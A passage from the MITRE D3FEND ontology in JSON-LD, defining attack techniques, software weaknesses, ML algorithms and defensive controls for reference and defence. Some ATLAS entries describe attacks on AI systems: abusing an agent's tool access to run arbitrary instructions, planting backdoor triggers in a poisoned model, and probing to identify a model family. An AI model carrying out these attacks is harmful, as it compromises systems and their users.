        "@id": "d3f:caused-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "_:Nf7fb115f9a0049a28996bf8eeef23b5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:CWE-602",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-602",
      "d3f:definition": "The product is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.",
      "rdfs:label": "Client-Side Enforcement of Server-Side Security",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:T1664",
      "@type": "owl:Class",
      "d3f:attack-id": "T1664",
      "d3f:definition": "Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.",
      "rdfs:label": "Exploitation for Initial Access - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploitation for Initial Access"
    },
    {
      "@id": "d3f:StorageSnapshot",
      "@type": "owl:Class",
      "d3f:definition": "A storage snapshot is a copy of a storage medium or system environment at a point in time.",
      "rdfs:label": "Storage Snapshot",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputingSnapshot"
      }
    },
    {
      "@id": "d3f:CART",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CAR",
      "d3f:definition": "The CART algorithm is a type of classification algorithm that is required to build a decision tree on the basis of Gini’s impurity index.",
      "d3f:kb-article": "## References\nClassification and Regression Tree (CART) Algorithm. Analytics Steps. [Link](https://www.analyticssteps.com/blogs/classification-and-regression-tree-cart-algorithm).",
      "rdfs:label": "CART",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:T1027.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.014",
      "d3f:definition": "Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone)",
      "rdfs:label": "Polymorphic Code",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:WebFileResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addressed-by": {
        "@id": "d3f:URL"
      },
      "d3f:definition": "A web file resource is a file resource identified by a Uniform Resource Identifier (URI) and made available from one host to another host via a web protocol and across a network or networks.",
      "rdfs:label": "Web File Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFileResource"
        },
        {
          "@id": "d3f:WebResource"
        },
        {
          "@id": "_:N079c4c98fee34974ab653adaa760c3b2"
        }
      ]
    },
    {
      "@id": "_:N079c4c98fee34974ab653adaa760c3b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addressed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:AML.T0014",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0014",
      "d3f:definition": "Adversaries may discover the general family of model.\nGeneral information about the model may be revealed in documentation, or the adversary may use carefully constructed examples and analyze the model's responses to categorize it.\n\nKnowledge of the model family can help the adversary identify means of attacking the model and help tailor the attack.",
      "rdfs:label": "Discover AI Model Family - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0014"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Model Family"
    },
    {
      "@id": "d3f:EnsembleLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EL",
      "d3f:definition": "In statistics and machine learning, ensemble methods use multiple learning algorithms to obtain better predictive performance than could be obtained from any of the constituent learning algorithms alone",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Ensemble Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:RegSetValueW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueW"
    },
    {
      "@id": "d3f:PhysicalAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalAccessMediation"
      ],
      "d3f:d3fend-id": "D3-PAM",
      "d3f:definition": "Physical access mediation is the process of granting or denying specific requests to enter specific physical facilities (e.g., Federal buildings, military establishments, border crossing entrances.)",
      "d3f:isolates": {
        "@id": "d3f:PhysicalArtifact"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CNNSI-4009"
      },
      "d3f:mediates-access-to": {
        "@id": "d3f:PhysicalArtifact"
      },
      "d3f:synonym": "Physical Access Control",
      "rdfs:label": "Physical Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:Na92c6dcee0434c2b8b3b433470a61a60"
        },
        {
          "@id": "_:N8c53977e131c4b60ae9fd1831182c142"
        }
      ]
    },
    {
      "@id": "_:Na92c6dcee0434c2b8b3b433470a61a60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "_:N8c53977e131c4b60ae9fd1831182c142",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:mediates-access-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "d3f:MemoryMapEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the mapping of memory regions into a process's virtual address space, enabling efficient access to shared or reserved memory.",
      "rdfs:label": "Memory Map Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Nb5684201603e45ed98d16e6ccd4c5a53"
        },
        {
          "@id": "_:N462d8c611c4e4894ac911b2c9c906a8d"
        }
      ]
    },
    {
      "@id": "_:Nb5684201603e45ed98d16e6ccd4c5a53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualMemorySpace"
      }
    },
    {
      "@id": "_:N462d8c611c4e4894ac911b2c9c906a8d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:T1093",
      "@type": "owl:Class",
      "d3f:attack-id": "T1093",
      "d3f:definition": "Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Elastic Process Injection July 2017)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1055.012",
      "rdfs:label": "Process Hollowing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1055.012"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1400",
      "@type": "owl:Class",
      "d3f:attack-id": "T1400",
      "d3f:definition": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1625.001",
      "rdfs:label": "Modify System Partition - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1625.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Modify System Partition"
    },
    {
      "@id": "d3f:ShimDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A application configuration database that contains or points to software shims (e.g., for backward compatibility, patches, etc.)",
      "d3f:synonym": "Microsoft Shim Database File",
      "rdfs:label": "Shim Database",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:AML.TA0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0008",
      "d3f:definition": "The adversary is trying to figure out your AI environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network.\nThese techniques help adversaries observe the environment and orient themselves before deciding how to act.\nThey also allow adversaries to explore what they can control and what's around their entry point in order to discover how it could benefit their current objective.\nNative operating system tools are often used toward this post-compromise information-gathering objective.",
      "rdfs:label": "Discovery - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Discovery"
    },
    {
      "@id": "d3f:T0843",
      "@type": "owl:Class",
      "d3f:attack-id": "T0843",
      "d3f:definition": "Adversaries may perform a program download to transfer a user program to a controller.",
      "rdfs:label": "Program Download - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSLateralMovementTechnique"
      },
      "skos:prefLabel": "Program Download"
    },
    {
      "@id": "d3f:T1675",
      "@type": "owl:Class",
      "d3f:attack-id": "T1675",
      "d3f:definition": "Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as `vmtoolsd.exe` on Windows guest operating systems, `vmware-tools-daemon` on macOS, and `vmtoolsd ` on Linux.(Citation: Broadcom VMware Tools Services)",
      "rdfs:label": "ESXi Administration Command",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Unsuccessful Logon Attempts",
      "d3f:exactly": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-7"
    },
    {
      "@id": "d3f:ContainerBuildTool",
      "@type": "owl:Class",
      "d3f:definition": "A software build tool that creates a container (e.g., Docker container) for deployment.",
      "rdfs:label": "Container Build Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwarePackagingTool"
      }
    },
    {
      "@id": "d3f:T1564.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.005",
      "d3f:definition": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)",
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:modifies": {
        "@id": "d3f:Storage"
      },
      "rdfs:label": "Hidden File System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N78f885ee5d20493ab4bacda6129add68"
        },
        {
          "@id": "_:N1370042fed564fba9145d79bb3d2aa7c"
        }
      ]
    },
    {
      "@id": "_:N78f885ee5d20493ab4bacda6129add68",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:N1370042fed564fba9145d79bb3d2aa7c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:may-be-weakness-of",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-have-weakness"
      },
      "rdfs:domain": {
        "@id": "d3f:Weakness"
      },
      "rdfs:label": "may-be-weakness-of",
      "rdfs:range": {
        "@id": "d3f:Artifact"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Reference-FWTK-FirewallToolkit_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://blogs.gartner.com/john_pescatore/2008/10/02/this-week-in-network-security-history-the-firewall-toolkit/"
      },
      "d3f:kb-abstract": "delivered to DARPA in ~1993",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-title": "FWTK - Firewall Toolkit",
      "rdfs:label": "Reference - FWTK - Firewall Toolkit"
    },
    {
      "@id": "d3f:EX-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0001",
      "d3f:definition": "Replay is the re-transmission of previously captured traffic, over RF links, crosslinks, or internal buses, to elicit the same processing and effects a second time. Adversaries first observe and record authentic exchanges (telecommands, ranging/acquisition frames, housekeeping telemetry acknowledgments, bus messages), then resend them within acceptance conditions that the system recognizes, matching link geometry, timetags, counters, or mode states. The aim can be functional (re-triggering an action such as a mode change), observational (fingerprinting how the vehicle reacts at different states), or disruptive (saturating queues and bandwidth to crowd out legitimate traffic). Because replays preserve valid syntax and often valid context, they can blend with normal operations, especially during periods with reduced monitoring or when counters and windows reset (e.g., handovers, safing entries). On encrypted links, metadata replays (acquisition beacons, schedule requests) may still yield informative responses.",
      "rdfs:label": "Replay - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Replay"
    },
    {
      "@id": "d3f:CWE-1100",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1100",
      "d3f:definition": "The product or code does not isolate system-dependent functionality into separate standalone modules.",
      "rdfs:label": "Insufficient Isolation of System-Dependent Functions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:d3fend-kb-object-property",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x d3fend-kb-object-property y: The object y is a d3fend knowledge base object property. These properties allow the linkage of knowledge and information supporting and illustrating the d3fend model.",
      "rdfs:label": "d3fend-kb-object-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:WindowsWriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes data to the specified file or input/output (I/O) device.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtWriteFile"
        },
        {
          "@id": "d3f:WindowsNtWriteFileGather"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile"
      },
      "rdfs:label": "Windows WriteFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIWriteFile"
        },
        {
          "@id": "_:Nae8a672ed1924f1aab0b681b8889fd46"
        },
        {
          "@id": "_:N3e31326d12ab4f41bc16492a2fd92691"
        }
      ]
    },
    {
      "@id": "_:Nae8a672ed1924f1aab0b681b8889fd46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtWriteFile"
      }
    },
    {
      "@id": "_:N3e31326d12ab4f41bc16492a2fd92691",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtWriteFileGather"
      }
    },
    {
      "@id": "d3f:AML.T0053",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0053",
      "d3f:definition": "Adversaries may use their access to an AI agent to invoke tools the agent has access to. LLMs are often connected to other services or resources via tools to increase their capabilities. Tools may include integrations with other applications, access to public or private data sources, and the ability to execute code.\n\nThis may allow adversaries to execute API calls to integrated applications or services, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.\n\nAI agents may be configured to have access to tools that are not directly accessible by users. Adversaries may abuse this to gain access to tools they otherwise wouldn't be able to use.",
      "rdfs:label": "AI Agent Tool Invocation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0053"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASExecutionTechnique"
        },
        {
          "@id": "d3f:ATLASPrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "AI Agent Tool Invocation"
    },
    {
      "@id": "d3f:MultimediaDocumentFile",
      "@type": "owl:Class",
      "d3f:definition": "Digital video files which often contain audio.",
      "rdfs:label": "Multimedia Document File",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Multimedia"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "d3f:CWE-703",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-703",
      "d3f:definition": "The product does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the product.",
      "rdfs:label": "Improper Check or Handling of Exceptional Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:T1649",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:attack-id": "T1649",
      "d3f:definition": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)",
      "d3f:forges": {
        "@id": "d3f:Certificate"
      },
      "d3f:may-access": [
        {
          "@id": "d3f:CertificateTrustStore"
        },
        {
          "@id": "d3f:CredentialManagementSystem"
        }
      ],
      "rdfs:label": "Steal or Forge Authentication Certificates",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Nb48dd02097fb47aeba5e8731f418056d"
        },
        {
          "@id": "_:N984b7df625b44d788d3e241c2a81b5f3"
        },
        {
          "@id": "_:N4617534be89a4ae4b75f195902e0e780"
        },
        {
          "@id": "_:N7bd1a853caa64f69806ee7cb435b854f"
        }
      ]
    },
    {
      "@id": "_:Nb48dd02097fb47aeba5e8731f418056d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:N984b7df625b44d788d3e241c2a81b5f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "_:N4617534be89a4ae4b75f195902e0e780",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateTrustStore"
      }
    },
    {
      "@id": "_:N7bd1a853caa64f69806ee7cb435b854f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CredentialManagementSystem"
      }
    },
    {
      "@id": "d3f:T1026",
      "@type": "owl:Class",
      "d3f:attack-id": "T1026",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "Multiband Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:IA-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001",
      "d3f:definition": "Adversaries achieve first execution before the spacecraft ever flies by inserting malicious code, data, or configuration during manufacturing, integration, or delivery. Targets include software sources and dependencies, build systems and compilers, firmware/bitstreams for MCUs and FPGAs, configuration tables, test vectors, and off-the-shelf avionics. Inserted artifacts are designed to appear legitimate, propagate through normal processes, and activate under routine procedures or specific modes (e.g., safing, maintenance). Common insertion points align with where trust is assumed, vendor updates, mirrors and registries, CI/CD runners, programming stations, and “golden image” repositories. The result is pre-positioned access that blends with baseline behavior, often with delayed or conditional triggers and strong deniability.",
      "rdfs:label": "Compromise Supply Chain - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Supply Chain"
    },
    {
      "@id": "d3f:Reference-DecoyPersonasForSafeguardingOnlineIdentityUsingDeception_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.archive.org/web/20180407204216/https://isc.sans.edu/diary/Decoy+Personas+for+Safeguarding+Online+Identity+Using+Deception/16159"
      },
      "d3f:kb-abstract": "What if online scammers weren't sure whether the user account they are targeting is really yours, or whether the information they compiled about you is real? It's worth considering whether decoy online personas might help in the quest to safeguard our digital identities and data.\n\nI believe deception tactics, such as selective and careful use of honeypots, holds promise for defending enterprise IT resources. Some forms of deception could also protect individuals against online scammers and other attackers. This approach might not be quite practical today for most people, but in the future we might find it both necessary and achievable.\n\nHuman attackers and malicious software pursue user accounts and data on-line through harvesting, phishing, password-guessing, software vulnerabilities, and various other means. How might we use decoys to confuse, misdirect, slow down and detect adversaries engaged in such activities?\n\n...\n\nThe wealth of personal details available on social networking sites allows attackers to target individuals using social engineering, secret question-guessing and other techniques. For some examples of such approaches, see The Use of Fake or Fraudulent LinkedIn Profiles and Data Mining Resumes for Computer Attack Reconnaissance.\n\nSetting up one or more fake social network profiles (e.g., on Facebook) that use the person's real name can help the individual deflect the attack or can act as an early warning of an impending attack. A decoy profile could purposefully expose some inaccurate information, while the person's real profile would be more carefully concealed using the site's privacy settings. Decoy profiles would be associated with spamtrap email addresses.\n\nSimilarly, the person could expose decoy profiles on other sites, for instance those reveal shopping habits (e.g., Amazon), musings (e.g., Twitter), skills (e.g., GitHub), travel (e.g., TripIt), affections (e.g., Pinterest), music taste (e.g., Pandora) and so on. The person's decoy identities could also have fake resumes available on sites such as Indeed and Monster.com.",
      "d3f:kb-author": "Lenny Zeltser",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "SANS",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyPersona"
      },
      "d3f:kb-reference-title": "Decoy Personas for Safeguarding Online Identity Using Deception",
      "rdfs:label": "Reference - Decoy Personas for Safeguarding Online Identity Using Deception - MITRE"
    },
    {
      "@id": "d3f:K-NearestNeighbors",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KNN",
      "d3f:definition": "The k-nearest neighbors algorithm, also known as KNN or k-NN, is a non-parametric, supervised learning classifier, which uses proximity to make classifications or predictions about the grouping of an individual data point.",
      "d3f:kb-article": "## **How it works**\nThe goal of the k-nearest neighbor algorithm is to identify the nearest neighbors of a given query point, so that we can assign a class label to that point. To determine which data points are closest to a given query point, the distance between the query point and the other data points will need to be calculated. The distance measures used can vary depending on the data set or implementation and help inform decision boundaries, which query points into different regions. Then, by defining the k-value (the number of neighbors to be checked to determine the classification of a specific query point), the data can be assigned its class label.\n\nFor classification problems, a class label is assigned on the basis of a majority vote—i.e. the label that is most frequently represented around a given data point is used (the term “majority vote” is commonly used in literature, however, the technique is more technically considered “plurality voting”).  Regression problems use a similar concept as classification problem, but in this case, the average the k nearest neighbors is taken to make a prediction about a classification. The main distinction here is that classification is used for discrete values, whereas regression is used with continuous ones.\n\nUnlike other algorithms that explicitly model the problem, such as linear regression, KNN is instance-based. It means that the algorithm doesn't explicitly learn a model. Instead, it memorizes the training instances and uses them as \"knowledge\" for the prediction phase. It's also worth noting that the KNN algorithm is also part of a family of “lazy learning” models, meaning that it only stores a training dataset versus undergoing a training stage.\n\n## **Considerations**\n\n* **Scaling:** Scaling is a problem as KNN is a lazy algorithm and takes up more memory and storage compared to other classification methods.\n\n* **Implementation and Hyperparameters:** As KNN only requires a k-value and a distance metric, it is often an easy implementation and can adjust will to new training data.\n\n## Key Test Considerations\n\n- **Supervised Learning:**\n\n  - **Cross Validation:** As cross validation methods like k-fold, leave-one-out, and stratified cross validation can help validate model performance. However, nuances like pessimism bias in k-fold cross validation or high variability in leave-one-out cross validation may need consideration.\n\n- **Classification:**\n\n  - **ROC Curve:**  A standard technique used to summarize classifier performance over a range of tradeoffs between true and false positives is the Receiver Operating Characteristic (ROC) curve.\n\n  - **Data Imbalance:** Imbalanced data sets where one class significantly outnumbers others, under sampling techniques like SMOTE may be beneficial in sampling minority classes.\n\n- **K-Nearest Neighbor**\n\n  - **Choice of K:** The number of neighbors, K, affects the decision boundary. A smaller K can lead to a noisy decision boundary, while a large K can smooth it out, but may also blur class distinctions.\n\n  - **K-d Tree:** Exact searching on large datasets can be computationally costly and inefficient. Implementing approximate nearest neighbor algorithms like the K-d tree algorithm.\n\n  - **Dimensionality:** KNN does not perform well while using high-dimensional data and can be sensitive to irrelevant features which can lead to overfitting.\n\n  - **Distance Metric:** Choosing the appropriate distance metric (Euclidean, Manhattan, MinKowski, Hamming etc.) is essential, based on the nature of the data.\n\n## **References**\n1. IBM. K-Nearest Neighbors Algorithm.  [Link](https://www.ibm.com/topics/knn?mhsrc=ibmsearch_a&mhq=k-nearest%20neighbors%20).\n2. Muja, M., & Lowe, D. G. (2014). Scalable nearest neighbor algorithms for high dimensional data. IEEE Transactions on Pattern Analysis and Machine Intelligence. [Link]( https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=6809191).\n3. Chawla, N. V., Bowyer, K. W., Hall, L. O., & Kegelmeyer, W. P. (2002). SMOTE: synthetic minority over-sampling technique. Journal of artificial intelligence research, 16, 321-357. [Link]( https://www.jair.org/index.php/jair/article/view/10302/24590).\n4. Kohavi, R. (1995). A study of cross-validation and bootstrap for accuracy estimation and model selection. Proceedings of the 14th international joint conference on Artificial intelligence . [Link]( https://www.ijcai.org/Proceedings/95-2/Papers/016.pdf).",
      "rdfs:label": "K-Nearest Neighbors",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:CWE-379",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-379",
      "d3f:definition": "The product creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file.",
      "rdfs:label": "Creation of Temporary File in Directory with Insecure Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-377"
      }
    },
    {
      "@id": "d3f:AML.T0043.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.004",
      "d3f:definition": "The adversary may add a perceptual trigger into inference data.\nThe trigger may be imperceptible or non-obvious to humans.\nThis technique is used in conjunction with [Poison AI Model](/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.",
      "rdfs:label": "Insert Backdoor Trigger - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Insert Backdoor Trigger"
    },
    {
      "@id": "d3f:ProgressivelyGrowingGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PGG",
      "d3f:definition": "Progressive Growing GAN (ProGAN) is an extension to the GAN training process that allows for the stable training of generator models that can output large high-quality images.",
      "d3f:kb-article": "## References\n\nMachine Learning Mastery. (n.d.). Introduction to Progressive Growing Generative Adversarial Networks. [Link](https://machinelearningmastery.com/introduction-to-progressive-growing-generative-adversarial-networks/)",
      "d3f:synonym": "ProGAN",
      "rdfs:label": "Progressively Growing GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSynthesisGAN"
      }
    },
    {
      "@id": "d3f:CWE-575",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-575",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing.",
      "rdfs:label": "EJB Bad Practices: Use of AWT Swing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:OTTestCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a  device to run a program in Test mode.",
      "rdfs:label": "OT Test Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Nbb3e91eb9cbc41ddbe07d976e4ce85b8"
        },
        {
          "@id": "_:N4802049755604e48a27d21c0ff1d7589"
